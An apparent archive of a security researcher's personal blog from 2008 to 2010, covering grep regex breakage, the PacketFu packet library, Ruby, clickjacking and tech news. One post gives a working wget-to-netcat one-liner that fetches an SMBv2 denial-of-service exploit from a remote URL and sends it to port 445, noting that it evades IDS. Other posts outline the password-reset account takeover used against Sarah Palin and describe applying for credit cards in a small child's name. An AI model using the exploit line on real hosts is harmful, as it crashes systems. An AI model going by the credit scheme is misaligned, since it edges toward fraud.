Plan B: Security, Technology, and the Law

Hey, I'm on Metasploit, now

2010-02-05T14:16:00.002-06:00

Just published my first Metasploit Blog Post. Whee, unauthenticated fingerprinting is my favorite and my best.

Grep 2.5.4 breaks regular expressions syntax

2009-12-28T13:31:00.005-06:00

Backwards compatibility is for chumps, apparently. GNU Grep version 2.5.4 fundamentally changes regular expression syntax from the 2.5.3 and prior behavior. The below demonstrates the backwards breakage between 2.5.3 (on box1) and 2.5.4 (on box2).

todb@box1:~$ grep --version
GNU grep 2.5.3

Copyright (C) 1988, 1992-2002, 2004, 2005  Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

todb@box1:~$ for i in cat parrot dog monkey
> do echo $i | egrep -v '^(cat|dog)'
> done
parrot
monkey
todb@box1:~$ 

### Meanwhile, on a system with grep 2.5.4 ###

todb@box2:~$ grep --version
GNU grep 2.5.4

Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.


todb@box2:~$ for i in cat parrot dog monkey
> do echo $i | egrep -v '^(cat|dog)'
> done
cat
parrot
dog
monkey
root@box2:~$

The second fails because the special regex characters of parenthesis and pipe loose their special grouping and alteration meanings in 2.5.4. Thus, this works for 2.5.4:

todb@box2:~$ for i in cat parrot dog monkey
> do echo $i | egrep -v '^\(cat\|dog\)'
> done
parrot
monkey

But the same does not work for 2.5.3:

todb@box1:~$ for i in cat parrot dog monkey
> do echo $i | egrep -v '^\(cat\|dog\)'
> done
cat
parrot
dog
monkey
todb@box1:~$

What this all boils down to is that scripts that rely on egrep are going to break pretty horribly and somewhat mysteriously when the underlying grep package gets updated; even better, there's no common method between the two versions to ensure that you get what you expect with a regular expression that involves grouping or alteration.

Naughty, naughty, grep maintainers. Off to submit a bug report now, but since grep 2.5.4 was released way back in February, 2009, I suspect the damage is going to be somewhat unavoidable.

If you know of a way to create a regex that will work in both contexts, I'd love to hear it. Single versus double quotes don't work, so for my purposes, I have to wrap my grep functions up in a version check of grep itself. (grep --version | sed s/[^0-9]*// | head -1 for the curious)

The most implemented exploit ever: SMBv2 Negotiate DoS

2009-09-11T16:00:00.008-05:00

Swinging by SecurityFocus' exploit list for the recent SMBv2 denial of service, I was immediately struck by the apparent silliness of listing five seperate but nearly identical implementations of the same bug. So struck, I daresay, that I could not resist writing my own stand-alone Ruby version, joking that maybe SecurityFocus will pick it up and make me famous.

Well, they did, and I did lol.

They also picked up I)ruid's much more interesting bash shell version. I thought that opening a socket straight on the command line was strictly the purview of Plan 9, but he proved me wrong.

The most "meta" version, so far, is Brent's wget-to-netcat implementation; I couldn't get it to function exactly as his tweet was written, but here's a version that Works For Me:

for i in `wget http://ur1.ca/bhe8 -q -O-|egrep 'oit.*".*"'|sed 's/s.*[<|=]//g'|sed 's/#.*//g'|sed 's/ "\(.*\)"/\1/'`;do echo -e -n $i;done|nc -w 1 127.0.0.1 445 > /dev/null

This has the added bonus of including some mild fragmentation, making IDS detection a little more squirrelly.

At any rate, I think this is all quite hilarious, and now I'm hopeful that the SMBv2 bug will be the widest-implemented DoS ever.

Update: |)ruid has published a version in Expect

Update: I've published a version in Perl

Update: Someone published a version in Java

AT&T Netbooks, only $1159

2009-09-10T15:35:00.002-05:00

I saw an ad on TV about AT&T practically giving away Acer netbooks. Here's the link of note.

So, it's $199 for a netbook, as long as you sign a two-year contract for a DataConnect plan... and that's where they get you, as they say. $40/month, plus $199, makes this a $1159 computing device over two years. Oh, and the $40/month plan is capped at 200 mb/month. Uhhhhh yeah.

This seems to suck significantly more than I expected.

Back to Plan A, being an Android phone on T-Mobile and a tethered POS laptop. Now to figure out if their data plans are unlimited. (I've been having creeping problems with my BlackBerry 8310, which is why I'm looking at this now.)

Why's (Poignant) Guide to Ruby

2009-08-21T12:07:00.003-05:00

Since it appears that Why the Lucky Stiff has rm'ed himself from the Internet (for the time being?), I want to make sure that Why's (Poignant) Guide to Ruby is available for general use -- namely, for my kids, when they're literate enough to learn how to program.

I had the opportunity to meet and work a little with _why in the spring of 2009. Given my very limited exposure to him, both online and in person, I'm not surprised in the least that this happened.

So, here it is, in PDF form -- it's been lurking on my various desktops for a while now, and I give it to anyone who says something like, "Gee, so what's this Ruby all about, anyway?"

I'm sure there are mirrors elsewhere as well, but this one is the only one I can count on.

Why's (Poignant) Guide to Ruby

Okay, Blogger, are we cool now?

2009-06-30T14:50:00.003-05:00

Yes, I really do have SFTP, and I would like to use that rather than plaintext FTP, if that's okay with you, Blogger.com. It is? Great!

I've fixed my RSS feed, again. Looks like Blogger and I were having some disagreements about relative path roots between SFTP and FTP entry points, and Blogger's error logging is supremely unhelpful in this regard.

Ah well, lesson learned.

PacketFu version 0.2.0

2009-06-13T10:54:00.003-05:00

PacketFu v0.2.0 was released today. There's really not a lot to this update, other than the direct inclusion of PcapRub and some more detailed installation instructions -- this week, a couple people wrote me to let me know that the installation instructions were, uh, less than forthcoming.

kballero wrote this Ubuntu forum post that goes into considerable detail on installing all the discrete components and some details on how to make wlan0 the default interface (as opposed to eth0). Many thanks for that!

At any rate, with this new version, I was able to install and run packetfu-shell.rb cleanly on a fresh LiveCD version of Back Track 3, so it should work for pretty much any Linux platform with a reasonbly recent libpcap version (If you get it running on WinXP and OS X, please let me know if you had to do anything special).

Still haven't worked out my performance problems; I suspect I'm going to have to ditch BinData entirely if I can't figure out how to fix it up to be a little more efficient with its recursion.

Few updates here, sorry

2009-04-10T09:28:00.004-05:00

You may have noticed that I haven't updated the Plan B blog since February. This is largely because I've been spending most of my blogging cycles on my employer's blog, BreakingPoint Labs. I suppose I should blogspam myself and just repost here, but I'd hate to divert the traffic. At any rate, that link goes to just my posts -- click around the rest of the blog for other people's.

My last post there was about AIM, specifically about AIM file transfers. It's a ripping yarn, to be sure. Here's a prettier version of the Ruby code to calculate file checksums.

So, whee.

Working on PacketFu Performance

2009-02-23T10:21:00.007-06:00

Here's a baseline of how PacketFu version 0.1.1 handles a set of 5000 packets. This benchmark test takes in a pcap file, then chucks all the processed packets into a Ruby array. The performance is horrid compared to Wireshark, but ignore that for a moment:

(these packets are all normal TCP packets)
(  1000) [17:26:48] {      20s}
(  2000) [17:27:13] {      25s}
(  3000) [17:27:43] {      30s}
(  4000) [17:28:19] {      36s}
(  5000) [17:29:01] {      42s}
2m33s elapsed, parsed 5001 packets.

Eek. So, the more packets I pull in, the slower PacketFu gets. This is pretty disastrous, if you're using PacketFu in offline mode.

So, after poking at PacketFu::Packet.parse() for a bit, I figured out this morning that if I make a good guess at the packet type before testing it for complete correctness, I get a fairly huge bonus in parsing speed. Here's a run with all normal TCP packets:

(  1000) [11:21:48] {      15s}
(  2000) [11:22:03] {      15s}
(  3000) [11:22:17] {      14s}
(  4000) [11:22:32] {      15s}
(  5000) [11:22:47] {      15s}
1m14s elapsed, parsed 5001 packets.

Testing the new and improved version with a mixed bag of packets, which contains ARP, TCP, ICMP, and UDP (and a few IPv6) packets:

(  1000) [12:21:15] {      11s}
(  2000) [12:21:30] {      15s}
(  3000) [12:21:48] {      18s}
(  4000) [12:22:10] {      22s}
(  5000) [12:22:36] {      26s}
1m32s elapsed, parsed 5001 packets.

Unfortunately, my creeping performance problem persists -- at least when I have a whole bunch of dissimilar packet types. But at least it's less pronounced now, and eliminated entirely when dealing with sets of TCP packets (which is going to be the most common use case, I figure).

Update: That was completely wrong. The only reason for the performance boost was that PacketFu::Packet.parse() was forgetting to read in the data. The below is even more true -- this is where the problem lies. Darnit! (please make sure to never use PacketFu r66, it's broken!)

tmanning has been looking at PacketFu lately as well, and believes that there are some (more) bugs in PacketFu::Packet.read(), mostly revolving around my atrocious design of how read() and parse() interrelate. I suspect this is the source of most of my performance problems as well, so keep an eye out for the next tagged version of PacketFu for some love in that part of the code. Oh, and I'll be fixing up the PacketFu::File.append() function to be a lot more sane, too.

Fixed my atom feed

2009-01-26T09:53:00.004-06:00

I moved my domain's guts around over the summer, and forgot to point blogger.com at my new atom feed. Welp, I just updated that now, so if you've been waiting for content, here's about six months' worth.

Honestly, I didn't even know anyone was looking at that.

Insulating Skilled Phishers

2009-01-09T08:37:00.004-06:00

Read a story this morning about the supposed shrinking (and presumably non-renewable?) resource of phishable dollars this morning, aka, the Tragedy of the Phishing Commons. Just a thought I had while reading it. Phishing is stupendously easy, so the field will attract lots of stupid entry-level phishers. While this is a detriment to the professionals (someone phished by a dumb phisher may be less likely to be phished later by a smart one), it seems this field of less-skilled phishers are more likely to get caught, which itself gives two benefits to the smart criminals.

First, law enforcement has finite resources and are almost always driven by bust statistics, so if they hit their quota of easy targets, the hard targets will remain in the field longer.

Second, while the professional phishers stay in the game longer, they will get better at it. At the same time, the law enforcement types, through their success at busting dumb phishers, will get better at busting the same kind of dumb phisher over and over again, further insulating pro phishers.

So, phishing can be seen in the same light as, say, drug dealing -- cops will tend to spend most of their time taking the least skilled players off the street, while the kingpin types remain to operate relatively unimpeded.

All speculation, of course, but I watched The Wire, so I'm confident in my ability to comment intelligently on police procedure. :)

I admit it: I love monkeypatching

2008-12-03T10:53:00.006-06:00

One of the things I like most about writing in Ruby is that if I find myself reimplimenting the same thing more than two or three times, I have the option of extending Ruby's base classes to incorporate that functionality.

People argue against this (usually by calling it monkeypatching), but when it comes down to it, I think it's a wonderfully fun way to interact with an interpreted language, even if it's not the safest or prudent habit. After all, the more fun something is, the more dangerous it's got to be, right?

An example base extension I use a lot is binarize -- it takes a String or Array and turns it into binary (really, a pack("C*") string). Here it is at pastie. Once implemented, "414243".binarize magically turns into "ABC." Delight all around.

The argument against monkeypatching is that it's not that much more work to create a module with a function of binarize that takes an argument, so you end up with something like NoFunAtAll::binarize("414243"). But really, only squares with C.S. degrees would do that. Devil-may-care types like myself prefer to extend String and Array directly, and damn the maintainability!

Plan 9 from Plan B

2008-11-26T12:34:00.002-06:00

I just put together a freshly installed VMWare appliance for Plan 9 and dumped it on the VMWare Marketplace. I was looking for a better solution for a distributed file system at my house, and am in the process of getting hardware together for a Plan 9 installation. In the meantime, I figured I'd get acclimated with the UI with this image, and a friend suggested I upload it so others may luxuriate in the alien beauty of Plan 9 from Bell Labs.

Twitterank and Password Sharing

2008-11-13T07:52:00.002-06:00

ZDNet is running a story about how "promiscuous" (excellent adjective!) Twitter users can be; original story here, and Twitterank creator Ryo Chijiiwa's followup here.

This would have been a slightly better story if Ryo was a security researcher who was trying to make a point about password sharing, but no, that was just a side effect of his viral web service (according to him, over two thousand opt-ins in under five hours).

The fact is, Ryo is not the first to ask for your password. Facebook and LinkedIn have been doing it for a while, mainly to rifle through your webmail contacts list, and I'm sure they're not the only ones.

I've never really understood why anyone would say yes to this, or even why it's acceptable to ask. Kids these days with their loose passwords and their Internet promiscuity.

BinData and Adobe Flash

2008-10-20T17:01:00.005-05:00

Have I mentioned lately how much I heart BinData? It's the guts of my own PacketFu, and now I'm using it to build up an FLV file format parser. It's a thousand kinds of rad, or more succinctly, k-rad.

Now I just need a cutesy name for the eventual Flash file format fuzzer... Ooo, I think I have one!

At any rate, quick search indicates that Aaron and Pedram have already written a custom Flash fuzzer using PaiMei. So I doubt I'll come up with anything decent.... but I do have that ancient version of Flash lying around on the Wii, so you never know...

Hopefully, I've have mine finished up tomorrow. Go Ruby! Go BinData!

Criminals like Blackberry too

2008-10-10T14:15:00.006-05:00

Saw an eWeek story this week about how bad guys heart BlackBerry for, surprise, the same reasons that good guys do. As far as I can tell, I'm the only one in my group, and possibly my whole office, with a Blackberry. It's nice to see this validation of its on board encryption versus the RCMP.

Take that, iSnobs.

Clickjacking (Maybe? Sort of?) Speculation

2008-09-29T13:55:00.003-05:00

Late last week, I wrote a couple blog posts speculating about RSnake and Jeremiah Grossman's canceled OWASP talk. After a couple thousand page views, I figure I ought to mention it here. The first post is about evading pop-up blockers through click trickery, the second is a postulation of what the "Clickjacking" problem really is.

To put it simply, human eyeballs don't adhere to the same-origin policy.

I've been spending the morning experimenting some more, and I'm pretty certain now that these techniques can be used to create some pretty convincing phishing sites.

At any rate, it would appear that sites can protect themselves with a frame busting snippet on every page with remotely useful forms. Requiring code like this duplicated all other the place sucks, of course. Practically, though, it's not a whole lot different from the ubiquitous browser detection snippets that litter the Internet.

Palin E-Mail: It's the Paris Hilton Hack

2008-09-18T17:10:00.006-05:00

I'm sure I'm not the first to mention this, but according to the Wired story, Sarah Palin's recent e-mail compromise was a result of the Paris Hilton Hack. How does it work?

a) Pick a famous person's data store. T-Mobile account, Yahoo mail account, whatever.
b) Perform a password reset. This will often trigger the data store's authentication mechanism to "fail stupid".
c) If the famous person played by the rules, you will be presented with a series of questions with nonsecret answers.

For Paris Hilton, it was her dog's name (Tinkerbell). For Governor Palin, it was where she met her spouse (Wasilla High).

Note to famous people: Your username is, in fact, your password as well. So keep that secret. Unless you lie on the password reset questions -- which effectively creates alternate passwords for you. You should fill out Yahoo's general security form to get your nonsecret answer changed. Note, this is a huge hassle at most places, unless it's another fail-stupid mechanism, in which case, other people may just do it for you. Shrug, use it and find out.

Personally, I usually use nonsense answers for the secret questions on my various web-based data repositories. I just live with the knowledge that if I forget my main password, I'm pretty much screwed for the follow up passwords.

PacketFu on Windows

2008-09-12T15:19:00.004-05:00

Barely a week after I presented PacketFu, I got an idle question about PacketFu's usefulness on Windows.

Last night, while I was waiting for my brother and his family to drive up from Houston ahead of the Hurricane, I got to messing around with compiling PcapRub on Microsoft Vista and Windows XP. Much to my amazement, my goofy hacks worked. The rest of PacketFu is pure Ruby without C extensions or anything, so cross-platform love is already baked in there.

So, the latest revision of PacketFu seems to work fine on XP (I haven't tested the Vista machine yet). It works so well, in fact, that I duplicated the climax of my Lone Star RubyConf talk in the form of a Flash movie (link downloads the FLV, it's not embedded or anything).

How many other packet libraries have screencasts a week after they're built? ZERO, that's how many!

PacketFu

2008-09-06T21:45:00.002-05:00

Today, I presented PacketFu at Lone Star Ruby Conf. I'm pretty pleased with it, although the guts are quite horrible still. Now that it's in a demo-able state, time to refactor everything and make it maintainable.

I'm sure the rest of LSRC was great... but I'm not a web app developer or a Rails nerd, so I couldn't really tell. Most of the time I was talking to people who were getting kind of sick with the whole Rails paradigm.

Expect a more detailed blog post at my employer's blog about my adventures with PacketFu.

MIT students gagged

2008-08-10T17:36:00.004-05:00

Looks like this is the headline from Vegas this year. Short story: College kids figure out that an RFID authentication system sucks, plan to tell others all about it at a high-publicity security conference. Their home state asks rather insistently that they don't.

A gag order is a little more civilized than a surprise detention by a foreign government.

A little.

I guess Massachusetts would prefer this kind of information stay in the real computer crime underground, as opposed to DefCon's play-pretend underground. Shrug.

KinderCredit

2008-07-18T09:27:00.001-05:00

My middle kid is scheduled to enter kindergarten in the fall, and I'm just finishing up copying all her identity documents for the school. Being that I have a bit of background in identity and credit, I look at her Social Security card, and wonder if she can get some credit history going by the time school starts.

I've heard the silly stories about credit card companies extending credit to little kids, so I went to CreditCard.com to get the latest student offerings. My kid has now applications in for Capital One and Citi "student" level credit cards; I tried for a Chase card, but that offer requires enrollment in a 4-year school or a 2-year technical/community college. Naturally, she couldn't complete that application on her behalf without necessarily lying on the application.

In fact, she was only able to complete applications for student cards -- my (I mean her) first attempts were stymied by the issuers' instance that applicants be 18 or older. So I don't know how these kids (and dogs) are getting cards without committing some kind of fraud along the way.

So, we'll see. Assuming the credit card applications fall through, the next step is to just get her jointly named on some card that I already have, (or even better, a joint savings/checking account), then wait around for the junk mail offers as her name and Social Security number starts churning through the credit system.

If everything works out, I'll repeat the process with my youngest kid next year. This way, by the time they're 18, they'll already have over a decade of rather perfect credit history, and might not be saddled with the horrendous student rates that plague most college freshmen.

A Strangely Accurate Photo and Headline Combo

2008-07-09T16:46:00.006-05:00

Saw this headline and picture combination on the Chicago Tribune today. Struck me funny.

Yay for dynamic editorship!

Computer Journalism Rathole

2008-06-30T13:59:00.008-05:00

PC Magazine is running a story, Texas PC Repair Now Requires PI License, which cites GearLog as its source (but no particular article). Gearlog, in turn, cites The CW33 via this article. CW33 is a television station newsroom which cites... nobody.

Through some other means, a friend turned up This KVUE story (another TV station), which mentions the "newly formed Institute for Justice." Googling with that phrase turns up the IJ press release, which might be the original source.

Holy hell. And nobody has even mentioned which new law we're talking about here, including the IJ.

Attention real journalists: Cite your damn sources. Sheesh.

Attention press release writers: Cite the law, please, so I don't have to paw around for that, too. I am very, very lazy.

Attention Mike Rife, owner of PCTech: If you're going to complain about getting a PI license, maybe you should button your shirt before you get mistaken for a real fake PI.

Update: Found it. My laziness was vanquished. Here is a writeup of the legislative text, thanks to some blog called "Post Process." Presumably, these guys are involved in forensics.

NB: Of all the people I know who practice network forensics in Texas (myself included), approximately zero percent hold a PI license, and the pre-2007 text seems to imply that all we Intrusion Analysts need a special Texas license, too. IOW, this sounds awfully unenforced, if not unenforceable.

Microsoft defaced... sort of

2008-06-10T14:23:00.004-05:00

Well, you don't see that every day:

The working theory is that there's a new root name server in town, which has taken over the old IP address of the "L" root (story here).

And it's returning bad information for, among other sites, www.microsoft.com.

On Microsoft Tuesday.

Isn't that sweet?

You may want to remove any reference to the old-and-busted address of L on your network. If you're an end user, it looks like OpenDNS has done this for you.